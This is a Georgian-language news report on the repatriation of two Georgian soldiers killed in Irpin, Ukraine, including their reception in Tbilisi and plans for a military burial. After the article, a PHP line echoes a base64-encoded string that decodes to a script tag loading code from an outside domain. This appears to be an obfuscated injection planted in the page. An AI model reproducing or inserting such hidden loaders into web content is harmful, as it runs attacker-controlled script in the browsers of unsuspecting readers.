celsiusi
ავერსი შნაიდერი
უკრაინაში დაღუპული ქართველი მეომრები სამშობლოში ჩამოასვენეს. თავისუფლებისთვის დაღუპულ გმირებს გამთენიისას თბილისში პატივით დახვდნენ. აეროპორტში იმყოფებოდა საქართველოს პრეზიდენტიც.
 
ქართველ სამხედროებს, გიორგი ბერიაშვილს და დავით რატიანს მოქალაქეები დაჩოქილები დახვდნენ.
 
გია ბერიაშვილი და დავით რატიანი ოკუპანტების მიერ ჩამოგდებულ რაკეტას ირპენში ემსხვერპლნენ. 
დავით რატიანის ცხედარი საკუთარ საცხოვრებელ სახლში გადაასვენეს, სადაც ოჯახი პირველ სამძიმარს მიიღებს. საღამოს ჯარისკაცის ცხედარს ქაშვეთის ტაძარში გადაასვენებენ. 
 
გია ბერიაშვილის ცხედარი ოჯახის გადაწყვეტილებით, თემქის სასაფლაოზე მდებარე ტაძარში გადაასვენეს.
 
დაკრძალვის დეტალები ბოლომდე დაზუსტებული არაა - თავდაცვის სამინისტროს ცნობით, ორივე დაღუპულს სამხედრო პატივით დაკრძალავენ, იქნება საპატიო ყარაული. თუმცა დაკრძალავენ თუ არა მათ მუხათგვერდის ძმათა სასაფლაოზე, ჯერ უცნობია. 
 
დაღუპულთა ჩამოსვენება ლვოვიდან, პოლონეთის გავლით, საქართველოს მთავრობის ხელშეწყობით გახდა შესაძლებელი. ჯერჯერობით, ვერ ხერხდება კიდევ ერთი დაღუპული ქართველი მებრძოლის - ბახვა ჩიქობავას გადმოსვენება. პროცედურა მარიუპოლში შექმნილი ვითარების გამო არის გართულებული.
756
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");